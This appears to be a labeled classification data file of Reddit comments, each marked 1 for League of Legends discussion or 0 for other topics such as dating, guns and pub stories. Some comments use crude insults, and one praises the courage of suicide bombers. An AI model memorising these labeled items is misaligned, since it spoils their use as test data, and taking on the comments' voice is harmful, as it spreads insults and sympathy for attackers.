1	I'm kind of glad that this topic came up, because I've dropped eve after her last nerf (actually the one which lowered the damage on her ult), but recently I've decided to pick her up again and check how she fits in current meta.   Early Game.  Despite being fragile (base defensive stats are pretty low), she is super fun to play early game. Not only you can punish enemy laner for just being at mid range of his lane, Eve is still viable as a counter-jungle tool (I think diamondprox was the first one to use her using this strat). Her passive is a pain in a butt for enemy while in laning phase, especially bot lane. Making their support buy pink every time he comes to lane, already creates a lot of gold deficit on enemy team, but her  W  sometimes make those wards worthless.   Mid and Late Game . This is where I agree with the author completely. If by this point eve is not super fed (and according to season 3 where junglers are mostly playing support/tanky role), she falls off. Her primarily thing in team fights is try to go around the enemy team, wait for the fight to start, and then  R-W-E-Q-Q-Q-Q-Q ... But with this nerfed ult and low defensive base stats, eve will get melted by support and adc alone, and in late game her damage won't be enough to even kill adc.
1	IIRC there were only 3 matches that crashed. WE was ahead in the initial Game 2 (which is why many say WE should've been the rightful winner because they could've won the Bo3 right there). Then in the initial Game 3 CLG was about to win when it crashed (no doubt there, the nexus was basically open to them). In the remake of Game 3 that crashed at around 20mins no one had a clear lead imo, it could've gone both ways.   So even if you split up the games in 3 Bo3 and count all games in favor of the team that had the lead during the game, it would've been:   WE - CLG.EU: 2-0 (Game 1 + Aborted Game 2)   WE - CLG.EU: 0-2 (Remake Game 2 + Aborted Game 3)   WE - CLG.EU: 1-2 (Postponed Bo3)   I didn't count the last of remake of Game 3, because a) no clear lead and b) it doesn't fit into the other Bo3's.   So
1	you have to factor in the perception of dyrus. he's widely known as the pro troll. RL singed etc.   the monotonous voice and WHY HELLO THERE etc stuff all add to the personality and it's addictive, especially when added in with dyrus' skill.
0	Really? Charging someone with a crime for falsely accusing someone of rape and ruining their entire lives is discencentive for real victims? The only thing it is is discencentive for for the women who FALSELY accuse men of rape, not real rape victims.
0	Took my dog to the pub, let him wander around the locals as normal. Got a bit drunk so he was sat with a group of strangers (I usually check they're okay with him and offer to take him back) Anyway, this table fed him an ENTIRE cheese board, biscuits and all. Come morning, there was shit and vomit everywhere... It was horrible.
0	I had a very similar thing happen to me. I went to interview at a competing restaurant in a different district in DC as I was not happy with how things were going at mine. Turns out, the GM at the restaurant I went to/the woman who interviewed me happened to be long time friends with the GM of my restaurant. I heard through the grapevine that boss lady at new place spoke to boss lady at my place and was explicitly told not to hire me for "going behind their back."
0	As a 'soccer' lover from southamerica, who lived in the US for several years (6), I think I can say that 'soccer' and american football are both a lot of fun.   Americans who believe that soccer is slow and boring find it so because they are used to many scores (goals) and can't stand the situation of a tie.   Soccer lovers find american football boring because it's insanely interrupted between plays.   The main difference between both games is the kind of excitement that gives a goal. In american football the (highest score) 'goal' involves a lot of build-up which culminates in the touchdown. Thus, the emotion of a goal lasts a longer time, but it is less 'adrenalinic' as the soccer goal. In soccer, a goal can happen in a matter seconds, either by a fast build-up or a counterstrike, and though the emotion is shorter, it is more explosive.
0	I am both a meat-eater and pro-choice atheist/agnostic, but philosophically this area of the "don't force your belief on others" really disturbs me.   Imagine some science fiction story, where the normal main character is transported to a small society in which many of the people think it's okay to commit murder.  I'm not talking about Logan's Run type scenarios where people are expected to surrender their own life in certain conditions - victims are still horrified and want to live/escape/fight back.  Just our usual societal assumption that murder is awful has been absent from these people.   Now our "hero" arrives in this society, and after learning how they operate, shrugs and lets them go on killing each other without even speaking up to disagree.  Are you really cheering, saying "way to go dude, don't force your beliefs on anyone!"   Back to reality. I get that you disagree with their belief, but if they  have  that belief (abortion is murder, eating meat is murder, etc.) then isn't the real "good guy/girl" thing "try to stop these horrible murders from being committed" ?
1	It's not just watching the minimap, it's more then that. i have only recently learnt to do this and i realise the big difference it makes, people just aren't experienced enough in the game to be constantly checking it the minimap. I sometimes find myself forgetting to check it when i'm focused on laning or trying to do something, the more i play the better i get at looking at it, it isn't as easy as just going "better look at the minimap". Just like how some players still play with camera locked, it takes time and practice to adjust to how the game works, they eventually get there if they're looking to improve their game.
1	I never said I was assuming that you said she is bad, only that what you wrote could have been suggesting that she sucked. So, in other words..
1	I know some of you fellow summoners work for The Man and can't view the forums, so...   >Hey guys.   >This is something definitely on our radar, and has been a talking point in our various teams at Riot for quite some time now.   >We're currently working on ways to make matchmaking more intelligent so this can be possible. The last thing we want to do is make NA East and West servers and change things up, so there's a lot of design decisions to take into account.   >In the meantime, we're working at optimising the connectivity from the East Coast to our servers on the West. This stuff does take time - but I promise we're constantly working in ALL of our regions on making it the best experience for everybody.   >
0	There was a Lysol commercial years ago with a nervous wreck of a party hostess. She just cooked fish before family arrived and this brat little girl calls out "It smells like fish in here!" However, the woman's generic air freshener barely covers up the smell. Now the brat exclaims, to the lady's embarrassment, "Now it smells like fish and roses!"
1	ITT  People that don't understand RIOT's profit center and the corporate structure of traditional sports leagues.5   The LoL players don't have as much POWER as the athletes in the players union, so they wouldn't be able to negotiate for nearly as much.  The reason a players union works is because without the players there is no league/profits for the teams.  For example:   If every NBA  player quit, they'd have to find shitty replacements or shutdown the league.  Millions would be lost.   If every LCS player quit- whatever, RIOT will still make a shitload of money off of selling RP, their main profit center.   NBA/MLB/NFL etc. players have WAY more commercial value, and therefor bargaining power in a players union.  League players can start a players union, but they won't be able to negotiate shit.  Negotiating is about leverage, and the LoL players have none.  If every midlaner in LCS quit, RIOT's profits wouldn't budge.  If peyton manning and every other QB quit?  Good luck getting the same type of broadcasting $$ that year.   REGI, GEORGE , AND THE OTHER NA OWNERS SHOULD START THEIR OWN, PRIVATE, LEAGUE.   (I hate how in this country people are hellbent on making owners of companies change they way they do things (telling riot to change, get an appeals process etc.) instead of strapping on their bootstraps and doing it better themselves.)
0	An observation that I've seen, and that I'll probably get yelled at for, but this is just what I've noticed in my 21 years:   Lesbians aren't "feared" by women because most women don't think their lesbian friend is out to fuck them unless they outright make a confession or make a move. Meanwhile, I see a gay guy talk to a male stranger and you can instantly watch a guy's expression change. Men seem to think that all gay men are out to turn them gay. It's not everyone, but I've seen a lot of men do it and no woman under the age of 50 react the same to a gay man or woman.
1	Jinx had a lot more hype because thy kept on giving us little sneak peaks of her over time, with the C in Caits lore, the vandalism on Vi's page, and all the madness on reddit, by the time people saw who she was everyone was already hyped. On top of that, Jinx is really unique and Riot even released their own music video for her.
1	Honestly, just watch TheOddOne's stream.  He's pretty hilarious and probably has the best jungle commentary.   As a jungle main, though, here are the biggest pieces of advice I can give:     Learn how to snowball - I had a 72% winrate as Jungle Mundo last season (gold).  A big part of this was because I took advantage of my team's strength.  In particular, by contesting buffs.  The first buff a jungler takes will respawn by 7:15 or so.  You should usually try to contest that buff unless you think your team would lose if a teamfight breaks out around that buff (most junglers don't time their buffs, though, so you can usually try to straight up steal it regardless if you can take it quickly).  Be sure to communicate to your team to contest the buff; make sure they aren't low when you try to contest it.  They should also try to push out their lanes to make it more difficult for the other laners to respond.  Once you take that buff, you have its timer so you can do the same thing AGAIN after five minutes.  Buff camps give a huge amount of exp, so repeated steals will hurt the opposing jungler and prevent them from handing the buff to a laner.  Additionally, stealing red buff allows you to hand off your own red buff to top/bot, which usually will allow them to destroy their lane opponent.     Be in their heads - When trying to gank, think about how laners usually ward.  For example, (flip if you're on purple side) top lane usually wards the entrance to your blue buff while bot lane usually wards the tribush and a lane bush.  This means you can gank top by going through their jungle and into their tribush while you can gank bot by simply running down the river.  You can also do some crazy ganks by, say, walking into the opposing blue buff entrance and flashing over the wall into the edge of their tower range or, for top, waiting in the river bush when the laner returns after their first recall.  If they put down a ward, they'll usually try to walk past you to put down a ward at your blue entrance, basically handing you the gank on a silver platter (though in S3 a lot of top laners are starting with wards, so check this at the beginning).  Get in the opposing jungler's head as well.  If you see one of your lanes overextending, especially if it's fed and/or the opposing lane is being pressured, you can wait nearby for a countergank.  If you take a buff level 1, you can expect the opposing jungler to steal your corresponding buff.  Plead with your support to ward that buff for you so you can kill him if the jungler does try to take it.  Even if you don't kill him, you'll usually end up wasting him time and an escape summoner.  Also, if the jungler is low after a gank, you can often find him taking wraiths/wolves before he recalls.     Blood Frenzy - Be like a shark if someone blows Flash, especially on characters with escapes.  In Season 3, time Flashes (5 minute base c/d in S3) and camp that lane hard (unless another lane really needs the help).  After all, a second and third gank will likely yield results as well as their tears.     Triage - Sometimes, either a lane is simply not salvageable (for example, if a laner like Nidalee who can't help much with ganks loses her lane) or all your lanes are losing, focus your ganks on the lane that can snowball the best and camp that hard.  You'll get yelled at by the other lanes, but it's usually for the best; you can't be everywhere at once.
1	Because you made such a big deal about being addicted to it and overcoming it"   "It's a time waster and doesn't grow you as a person or spiritually"   "Nobody said he 'can't' play legends of whatever its called. It was the fact of omission to it being an addiction. No different than smoking, stealing, drinking, gambling, overeating. Would you still be encouraging him to continue in those activities? Anything taken to an extreme becomes a liability (...) anything can become a downfall. It's the time you give to it and letting it consume you."
0	She's a bitch, he was 8. Shit happens.
1	Just understand, Riot needs to do this now. Like every 3rd player is using a programm that shows them the jungle timers, automatically or manually.   So this gives every 3rd player a big advantage imo.   And players who dont have it, it gives them a big disadvantage.   So, this is NOT fair. I know 3rd programms are not allowed, but Riot cant do shit about ppl using them. They're also 10000 apps on the mobile phone who can do this.
1	Yeah but I'm pretty sure they pay their CSGO team pretty well (Forest don't come cheap) so you can't just take money out of CSGO and put it into the LoL team. On top of that you need to think about how much money they poured into the LoL team with the belief of not only getting into the LCS but likely staying there for at least 2 splits.   Going back we have when they  bought  Lemondogs spot (Which they then lost).  Then they got the team of arguably the best players they could find (who would likely also not come cheap - Zoro, Mithy, Nuke etc.) because if they were cheap they would just go to the  much  better offer  IN THE LCS . Fast forward a bit and we have them pick up Alex and Freeze. I'm not sure about Freeze but I know the deal with Alex would have been pricey as they not only got the gaming house  and payed for an analyst who gets more than the players do  but they got Alex an apartment for him and his family.
0	apparently, I stood by silently while my inlaws attempted to put together a pack-and-play that was loaned to us. they fussed and muttered over it for about 5-10 minutes trying to get it pop-up and stay up, but it just kept falling down.   I said, how about this lets read that big block of text at the bottom of the thing that looks like instructions. shockingly less than a minute later it was setup.   it's not just men. it's just some people.
1	Funny how everybody downvoted me when the patch-notes were on PBE and I said it was a buff not a nerf.  So many salty ADC mains telling me I was wrong and that 50 rnge is insurmountable.   Now he's banned because I was right, it was a buff, so much so that he's not even bugged and they've disabled him.
1	Slightly different scenario: last night I was top Mundo vs an Akali. She wasn't awful, but she wasn't very good either, and their jungler was shit while mine was pretty awesome for our level. We were very very obviously winning, and I could tell they were having a bad game. Late game Akali comes into all chat and asks if she can just kill me once. I tell her to come to Baron, then proceed to run in circles around here for a good 45 seconds while she killed me. Felt good to know it made her happy.
1	what if a team got 2nd in the spring split + playoffs, gaining 9 points, and then they just fall apart similar to XDG and get relegated the next? 9 points may still be enough to get them into the qualifiers, but it's kind of awkward since they are one of the two potentially relegated teams of the summer split. and then maybe a rising team like CLG will not get the points needed, gaining 3rd place in the summer split (4 points including playoffs), but can't attend?   maybe i some logic errors here but i still think this system rewards spring split rewards too heavily. maybe lower the amount of points awarded for the spring split? so that if a top 3 team in spring split is unable to maintain their top 3 status in summer split, then they should be unlikely to make it into the worlds qualifiers.   basically
1	Magic resist is not the only counter to magic damage. The fact that magic damage usually comes in bursts (Leblanc, Veigar, Akali, Tristana etc.) means that once the combo is over, that champion becomes useless while waiting for cooldowns. Therefore, building health against heavy burst is very effective because once you survive the burst, your window opens to either kill that champion (who is most likely very squishy), or have your team kill that champion. You can't build health vs. physical damage because it is sustained damage, the best way to counter physical damage is with Randuin's Omen (passive & active) or some form of disable / crowd control.
1	Wow. Never thought I'd actually be able to say this, but: Jesus. Scarra honestly acted like a child, and showed very poor sportsmanship after placing 2nd. That's very sad to see, as I've always thought very highly of Scarra. I'm not one for name-calling, but if we're being completely blunt and honest here, Scarra needs to stop being such a bitch. You lost. You're upset that you lost. We get it. Now act like a professional, and give credit where credit is due. K, I got that off my chest. I apologize for that.   The way the other teams treat/think of TSM really frustrates me. They act as if TSM doesn't deserve their current reputation, as well as their recent 1st place spot at Regionals. At/after every event I've seen, these people act as if TSM placing first, and beating them, is nothing but a fluke. Yet, it happens again and again. Seriously guys, stop being so bitter, take your loss, and give them some credit.   Now, as a disclaimer: No, I'm not a TSM fanboy. I actually like a LOT of the NA teams (EU, as well, ofc). Curse/Dig/CLG/TSM are all great teams, IMO, and I support them all pretty equally.
1	Son of a bitch, I had such a big post written and then I hit the page back on the mouse. Ugh   Well, I came up with my zinger after writing the huge post, so whatever.   The same exact issues we are having in NA happened earlier in EUW, until they built a new datacenter. Now problems on EUW are exceedingly rare, and is probably the most stable server right now. My personal theory is that when expanding (as I'm sure Riot didn't start out with the capacity to hold this many users), they've been taking shortcuts, leading to the issues we are now experiencing. Or, to be honest, it might just be impossible to efficiently expand an existing datacenter for something like this. Either way, building a new datacenter fixed the issue for EUW, so they should do the same here. Which brings up the question of why they didn't earlier, if they knew this would occur.   But yea,
0	When I worked in a grocery store we had a fat women flag down one of our sacker's in the parking lot who was getting shopping carts at the time to have him bring her a motorized scooters.  He brought her the scooter and went back to get carts, well about 10 minutes later he noticed that she never came into the store.  Naturally we thought it was stolen so we checked the entire shopping center our store was located into find it and didn't find it.  When we get back to the store another store calls us and said that they had a customer with our scooter.  Funny thing she had taken it to a Christian store on the other side of the shop center because they don't have any and she didn't want to walk around their store cause it was to much work for her.
1	I dont get it, why cant riot just make khazix the way he were at the beginning? before all the nerfs, when you could midair w, and when w applied his passive. that was a good state for him, you couldnt just go in oneshot everyone adn get out, you had to wait for the right moment, go in, execute with q(that wasnt as powerfull back then), get our with a reset and do it again. If Riot nerfs him like this he will become useless and disapear from play, like urgot. After they nerfed his w and buffed his q he has been broken as shit, but now he will be garbage.
1	Players who spam normals (i hate to say this, but it's true) just aren't tryhards. I'll admit I don't try my best in normals, I try new stuff. But the other day i queued up for a normal as vayne. The opposing jinx just let me freefarm, no harass or all ins until level 6 and then they telegraphed it quite obviously. It was so passive that it made me want to go back to ranked. My team took its time and didn't really do much at all. they grouped when they wanted to, not when we had to, dragon wasn't taken until level 13...etc, etc.
1	It appears CarlinT has contracted NCS or new champion syndrome. This is a common occurance when a new champion comes out. The lack of knowledge of how to fight the champion coupled with having to learn on the fly makes fighting him difficult. Also the new champion has yet to be fully tested & brought into line. Give itime & he will be brought back in line.
1	it's very simple and with very i also mean very.   imagine you are the best LoL player in the world (the rest of the world doesn't know this and since you just got your account to lvl 30 you don't have the ranking to prove it either). this means that your knowledge, skill level, deduction level, playing style, adaptability are 10-10000x greater then the average you play with/against.   now you go ingame, you play sivir and they last pick vayne, this is soloq so laneswapping is impossible and you will end up playing vs. your counter. now your support is used to his friend( the adc normally) poking and engaging a bit and initiating on his own. however you poke and shit, but supports are supposed to engage in your opinion, so you end up playing the entire laning phase either in pure passive farmmodus or you both end up dead because there is 0 initiative.   both of you will think the other is an idiot for not initiating and missing opportunity's because of it. was your support wrong for assuming you would initiate, yes and no, that depends on the situation, your strategy and personal factors. were you wrong for assuming the support would initiate, yes and no, that depends on the situation, your strategy and personal factors.   assuming things is never good and explaining all variables isn't my point.   my point is that no matter what story, there are always 2 sides to it. if i have a bad start because i'm forced into jungling and i die in an early invade and then again when i still try to help the lanes with ganks. is that my fault? they lane i died at thought so and reported me.   now i don't want to play with that person ever again and i understand he wouldn't with me either, but had he helped and managed to kill the invade with me, would things still have worked out like this?
1	Can people stop joking/complaining about things like this?   For once and for all, the fact that things like this pop up  again and again  tells us that people  really want it in the game .   And since we  don't  have a "master thread" and such, to collect and list all of these requests, I see no reason to prohibit people ("new" people, who haven't seen these ideas posted before) from sharing their opinion.
0	If he wants something to show for his achievements, he should be playing the 360. That's how I roll. Fulfilled.
1	Above fakers lvl please. Im by no means a fanboy of korean league. But thats just beyond stupid. Incarnati0n hasent proved anything in a lan envoirement. And owning soloq is hardly a sign that you're gonna do well in  a proffesional setup, proven countless times now.   And sure he is truely a soloque monster. But a cliffhanger people seem to leave out is that most of his rank1 was archieved by duo-Q recently a good example would be his r1 at the moment (Apdo dog2) Duo-Q a shitton with Rekkles and WhiteKnight108 (Another pretty sick soloq guy)   Im not saying he wouldnt archieve rank1 without, but it certainly helped.
0	I think there's something you forgot here.   The only fact that you allow your people to bear a weapon is disturbing. You are basically saying them that :     Your police isn't trustworthy   They need to fear people they don't know     That's how you fuck a society up. By letting them understand that they are alone. Of course your country is one of the most invidualist system in the world : you make people fearful of others. You can't trust others, because they can be dangerous. So you have to defend yourself from them.   When i leave my house, i don't even think about getting a weapon. I live in a french banlieu (=ghetto), i know some guys who got weapons (and i mean, bad guys. My brother-in-law was arrested for a roberry, when my sister used to date stupid guys), but even then, i don't fear them.   In the worst case, they will use their weapon to threaten me. They will not fear that i could use mine. Because i don't have one.
0	I should retract what I said about not respecting suicide bombers. I do respect them. just not their cause.   War happens for a variety of reasons. But no individual fighting soldier(keyword:soldier, not a staff officer that never touches a battlefield) is the cause of a war. You may have to kill him. But you dont have to hate him. In fact, you SHOULD, as a soldier, respect the other soldier. Its customary to give enemy soldiers proper burials when possible.   The kamikaze and suicide bombers are giving up their lives(not risking losing it, actively giving it away) for a cause they truly believe is just. They were one army fighting another. They did not hide amongst their civilians(talking about the kamikaze's in particular here). They were in clearly marked planes. They werent hiding. They were coming. And their target was fucked. It wasnt pleasant. But it was fair. Japan really had no choice but to enter the war. The US had cut off trade because of their alliance with Germany. It was fight or starve. The pilots' families were taken care of for their heroic deeds. Can you imagine training for months knowing you had 1 specific purpose?   The sectarian suicide bombings follow a similar pattern. Only they do not represent a nation. They represent an ideology. The individuals who blow themselves up are almost ALWAYS 1 of 2 types of people: they're doing what they believe is "right" or they're being extorted/bribed. So they do it for the welfare of their families or they do it for something they believe is much bigger and much more important than themselves. You'll never find one of their commanders doing it, obviously. What makes this horrible is what exactly they're blowing up. A seemingly harmless man all the sudden explodes and a school full of little girls has to die because some people think its immoral for a woman to learn. THATS likely why you cant respect it. forgive me if I am wrong. You have every right to correct me.   You've probably read a thread or 2 on reddit before about suicide, attempted suicide, suicide survival, etc. You've heard what an incredible amount of courage it takes to pull the trigger. While you may not agree with the reasoning or the suicide itself, you have to respect what it took to actually do the deed. Its not something YOU could just do like it was nothing, after all.
0	Back story:   It's one of my girlfriends best friends. A few weeks ago her boyfriend at the time cheater on her and gave her Herpes. She broke up with it and we hung out with her for a few weeks, even though she is a selfish idiot who really put herself in the situation she ended up in. We helped her get over the "herpes is the end of my sex life" stage.   Late last week, she started talking to my buddy I know from service, my girlfriend and I were out last night and she said "Friend hang out with Friend last night" and rolled her eyes. I asked if she told him and she told me that she didn't.   My girlfriend was super mad at me for a good 20 minutes after I told her, but I told her the only victim here is my friend, and she shouldn't allow her friend to treat people like that.
1	The main difference though is that qtpie's stream is soloq while this is the stage where it counts and plays there are far more impressive due to the pressure these guys are under.   I d still say it was a massive outplay that should be recognized.
1	Cass isn't bad per se.   It's just that Cass isn't that much better than other AP casters, and Cass is really, really unforgiving to play. Miss your initial poison spells? That's a lot of damage that your fangs won't do. Move a little bit too close to cast your spells? Take damage that you can't afford as a squishy champ.   Cass's ult is situational. If you find yourself close enough to use it, then something went horribly wrong.   I like to think of Cass as a more extreme "glass cannon" version of Karthus, except with worse utility and more single-target damage. I think that Karthus is a safer character, and I'd rather see a Karthus on the team rather than a Cassiopeia.   That said, it's not a bad idea to learn to play Cass. If you play perfectly, you'll beat the enemy. If you make the slightest mistake, you'll know instantly.
1	Just dodge ?   When youdodge a game and you're not in promo, you justloose LP, your MMR stay the same   This is why you can find bronze people in Diamond 1 MMr.
0	I am 5'11" 190 and my gf is 5'9 130 and very slender. I can almost fit in to her pants.
1	I agree with OP plus some adc in low elo feels like rambo poking with autoattack then a wild j4 charges and ulti and he dies in secs
0	The UNODC 2005/2006 data doesn't have an entry for "total assaults" for the United States, but data is there for "major assaults":   England and Wales : [35 per 100,000](   United States: [288 per 100,000](   So, at least when it comes to "major assault", the US rate is dramatically higher. The UK, however, has about 50% more robberies per capita. Reported rapes are nearly identical. Keep in mind that aggravated assault makes up the bulk of all violent crimes.   In my search I came across [this]( blog that claimed that the violent crime rate in the UK is 8 times that of the United States. Interesting, right?   But, the author of the blog made a pretty serious error: The UCR violent crime data used for the Unites States  excludes simple assault . The data for the UK  includes all assault . And from the National Crime Victimization Survey we can see that the simple assault rate in the US is five times higher than the aggravated assault rate. When you take that into account, the claim that the UK has 8 times the violent crime becomes pretty clearly bogus. And that doesn't even taken into account that the definitions of assault are quite a bit different in the UK making all of the statistics even more difficult to compare   Things like that are why making direct comparisons of crimes from different countries is no simple task.   Further reading:
1	Your probably used to just jumping into squishies but when big fights break out you wont be able to initiate without defensive items because you will just die. You need to sit back and wait for them to blow a few spells then jump in on their carry and kill them. Most junglers excel in small fights ie 3v3 and 2v2 but when faced with large fights especially against farmed a top and mid the relative gold you will have is less so you wont be able to go toe to toe with them.
1	Well it's a small lane, mid lane, then there's also the fact that he can ride the minion wave pretty well, so there's not a lot of outrunning to do. The main thing I do to yasuo, is play off the weakness of his Q cooldown at early levels. Most people think he's OP because he can just knock you up & all in you with ease, but actually it's pretty hard in most cases. If you give a solid line of minion wave & standing a fair distance away from tower, he's going to stack E & walk up to you & auto+knock up you down before hitting you with the max damage E. On the flip side, if you shove his lane & start harassing him, Yasuos tend to slip up & miss the knock up(if they have it) & it takes around 40 seconds before they are able to throw another one.
0	Okay, story time.   Me and five buddies went to San Francisco for a musical festival a few months ago. Per the restrictions of the festival, you were not allowed to bring in any sort of alcoholic beverage at all. But being the poor college students we were we said "Fuck that, we're not paying 10 bucks for a beer." So we decided to bring in our own alcohol, as most responsible,  21 year olds do.   So my friends and I are sitting in the hotel, taking shits, getting dressed, putting our alcohol in our backpacks and hiding them the best we can when one of my friend pulls out the Everclear. Now this was the first time I've ever encountered such a strong drink and wanted no part of it until I'd at least had my breakfast. My friend, Ryan, was on the same boat. To hide the Everclear we poured it into a water bottle but mistakenly left it on a night stand, and put an actual bottle of water into a backpack. About 10 minutes pass, people are still getting ready when suddenly Ryan practically gags/vomits/drools Everclear all over the hotel room. Everyone was pretty confused why the fuck someone would be spewing water of their mouth but seconds later we all knew what had happened.
0	Throughout a class I had this semester, there was a girl that sat in front of me. She took snap chats of herself every second she got. In a dark lecture hall and me possessing basic human biology, l ended up looking at the light being moved around a row below. Every single one of these selfies ended up with me in them staring at the camera. I once wondered if she noticed. So, I would lean so I was blocked by her head. She turned around and looked at me. I suspected that I had gained traction as a theme in her background. It was really weird and made me uncomfortable. I thought about moving, but with it being this late in the semester, I decided to just ignore it. The last day, I moved a seat over. I noticed I was still in her selfie somehow, so I started attempting to move out of sight. I couldn't. She was purposefully putting me in her selfies. Perhaps, it was because we were actual opposites. She was all perfect all the time for an 8 am class and, if you were lucky, I would roll in wearing PJS. Usually, I would just wear yesterday's clothes. Any reason for it, some girl has dozens of pictures of herself with me staring with annoyance directly into the camera.
0	It's funny that I came across this because I used to feel the exact same way about it. Now I am currently dating a woman with a son. I had a thing for her years ago but it never went anywhere because of age differences. She had a kid at 16, she's almost 19 now. I was really upset about it because I wanted a relationship with her, but when I heard she was having kid I went off my rocker because of how I felt, that I could never ever be with a woman with a kid. Not just because of feeling OP's way, but also because I zero experience with children, being an only child, and have never made any effort to change that. I honestly couldn't stand being around them for even 5 minutes. I was even angry at her for getting pregnant, and she was so confident that her ex was going to see her through it, even gave the kid his last name.   I decided to just go for it and change my mindset. I'm certainly not in a position in life to have any children of my own yet (24, still want to finish my education & such), but I'm taking it as a learning experience for when I do want one or two of my own someday. I've already learned a lot, and she is okay with the fact that I'm just not experienced. I'm not comfortable enough yet to be changing his diaper or really holding him or getting physically close, and I still have my beliefs about it all looming over me, but I've gotten a lot more comfortable and I've learned how to deal with him in certain circumstances. We live some ways apart and I only see her for a few days a week (when finances permit, sometimes a couple weeks), so I'm certainly not "raising" the kid, and I really don't know what I would say if he ever asked me "would you love me as much as your own kid?"   I still have a long ways to go, and there are definitely better candidates out there for her as far as having a man to help raise her son, but I'm trying and I'm learning, and I am happy that I was able to get over my past beliefs about it all and be in a relationship with someone I love and care a great deal for. I hope that I do get better with it all so that I actually can help raise him and be better prepared for when I have my own.
1	opinions and personalities. that's how dyrus is; u want to force someone's personality to change? if u want a streamer that entertains with commentary more then go watch oddone or something.   for those of u that follow starcraft streams, u should know what idra's stream is like. his mic is usually not even on and he just plays music. hes not streaming always to entertain, he's streaming to show u him just playing the game when hes practicing and such. dyrus is doing just that.   i don't understand y ppl r hating dyrus' "new attitude". dyrus said he wanted to take LoL more seriously and he's doing just that. hes more successful and playing in very high level tournaments which means he needs to practice more than just entertain. when u take the game seriously, u play to win and not do fancy things to entertain.
0	ya, sadly that's true.  experienced it first hand.  there's a study i read about that men become close friends with a girl ONLY if there is some underlying sexual attraction.  most of the time the girl has no idea and while she may find him attractive, she genuinely never frames the situation as a potential courtship.
0	I had an account for a couple weeks and i'm an attractive girl in my very early 20s. I went on specifically to find someone who i was compatible with; I thought a site which allowed you to write out all your interests and a picture would be a straightforward and efficient way to do that. yes I only messaged back guys I found  attractive  enough ** (this includes guys that i wouldn't typically bother with, but they had similar interests and personality to compensate for their lack of better looks). I also  didn't message back hot guys who obviously had nothing in common** and would offer up stale conversation. There has to be a balance of attractiveness and commonalities/ease of conversation. I sometimes messaged guys too, and sometimes didn't receive a response - it happens (and no they weren't absurdly attractive, just guys i thought had that balance).   I don't know what you, or the girls you were messaging look like, but all i can say from my personal experience is that i ended up deleting my account because too many guys are either delusional about their attractiveness, or expect rejection and just mass message every attractive girl they see.  I was receiving loads of messages from guys who were so absurd it was making me uncomfortable - guys way above or under the age i stated i was interested in; guys with NOTHING on their profile in common with mine who were obviously just messaging me "cuz ur hot" (i.e. sex); guys with pot bellies, balding heads, and the fashion sense of a cab driver. YES i realize these are shallow things, but they messaged me because they saw my profile - which i meticulously wrote out with genuine interests of my education, aspirations, and love of music, film and art; and filled with pictures of me with my flawless skin (which i put effort/ care into maintaining), small waist, young, pretty features, and obvious interest in style/clothing. I expect a barrage of downvotes for that last statement - because girls aren't allowed to admit they're attractive or that they put effort into their appearance without being vain cunts.   What i'm trying to say is - the dating website began to feel no different than walking down the street and getting hollered and cat-called at by unattractive, old, creepy guys shouting impersonal "compliments" about my appearnace who know nothing of my personality and don't care. Christ i even had one chubby middle-aged dude ask me if i was interested in him being my sugar daddy! so degrading (and no i have nothing on my profile to imply that I would be interested in that sort of thing ). The point i'm trying to is that these websites have an inherently shallow feature - pics. Looks are going to be important - but for people really looking for something serious that shouldn't be all that they acknowledge. But check yourself to make sure  you  are not being very shallow, hitting on girls first and foremost for their physical features.
0	Because when bad things happen, people like to fix blame on someone or something. Specifically, someone or something they don't like or don't necessarily fully understand. They can blame drugs, religion, lack of religion, video games movies, parenting, culture, etc. But it's never, or very rarely, ALL drugs, or religions, or video games, or parenting skills, etc. It's the drugs they don't take, the religions they don't follow, the video games they don't play, or a parenting method they don't follow. It's a lot more comforting being able to convince yourself that it could never be YOUR kid who bullies a kid into suicide or goes on a shooting spree, and as long as the causes can be grossly over simplified and blame can be placed on something that doesn't cause you to change or open your mind, people will continue to blame violence on people or things that are, at best, only vaguely connected to the crime.
1	It's been stated before that many skins, and especially the battlecast (and possibly pulsefire) line of skins, are not canon, but a fun imagination of an alternative Runeterra/future Runeterra.
1	Not to pick on you but I'm going to tell you why you are wrong.   > TSM makes multiple times more with just ads than the prize pool. This really is unacceptable   The prize pool disclosed so far just for this year is $100,000USD. That's money in the bank that will be paid out for tournament wins.   Lets look at a massive LAN over several months and compare shall we.   OGN Summer has 16 teams competing. Their total prize pool is about $117,000USD. They have multiple revenue sources like tickets to get in, broadcast TV rights and advertisement revenue, apparel, publisher subsidies, outside technical support, etc. They are also able to leverage economies of scale that come from being OGN and Korean eSports.   Oh ya they also charge for non month old VoD access.   Under the free HD model as was disclosed by Dan Dinh, SoloMid was losing money with each tournament. This was with paying one caster and Dan doing the work on his own. As much as we love Dan's one man casting ability we don't want him to suffer as he did then.   SoloMid wants to do good by the community that means not only having a watchable stream, but having great competition, supporting LoL's casters and teams that win. Some of the past winners of SoloMid's NA Invitational series have used their winnings so their unpaid managers hotel, airfare and other accommodation expenses were covered and they could go to LAN events.   Any streamer under the SoloMid banner keeps their streams revenue. SoloMid does not touch that money. So people thinking SoloMid takes from TheOddOne's or Dyrus' money as you seem to be is wrong.
1	Here's a story of my most recent series. I hit 100 lp and then my 1st game has a Yasuo who ignores what positions our team calls. He proceeds to feed mid,  blame jungle and the top that he took mid from, then buy 5 mobility boots.   I win my next game, but my last one has a bickering bot lane who decide not to lane together after 1-2 deaths. Of course the solo adc gets stomped.   I work my way into series again. I win 1, my next game has a Diamond V Tf who ignored us calling our roles. He didn't listen to our pings, didn't call Mia when we asked him to, and didn't roam. We ended up losing because of the fed Kayle from his lane. He then blames us and refuses to group as we lose and ults into their team. My last game has Mundo who refuses to group. I said I'm in my series he replies with "I'M GONNA WIN GUYS" and runs solo into their team and dies. I told him wow I'm in my series it's not fair for you to do that to me on purpose. He replies with "Leagues not fair, deal with it" and feeds again.   Yea it makes me feel so excited to play promos...I work for 100 lp to drop to 82 lp because of people like this. I don't disagree that maybe I wasn't good enough to carry but its one thing to try and win with a bad player but another trying to win with an  intentional  feeder in a series.
1	So, if I spend the 3150 on him and don't like him, I lose 3150?   3150 is a mid-point in the price range. I could buy tons of different champions for that, or a whole crap ton of runes, and that's just lost?   The point behind free week rotation is to give players a chance to play champions for FREE to try them out for a week, and therefore learn if they like them enough to go spend the IP on them. What if I trial them and I don't have enough to finish buying them afterwards? Heck why would I trial them for half their price and lose out on half way to a 6300 champ (or another rune page) if I have the IP to just buy them flat out? Every player aims to eventually own every single champion, even if they don't play them all, because you never know when you might want to learn them, and it also helps a lot for trading champions (and making ARAMs hilarious).
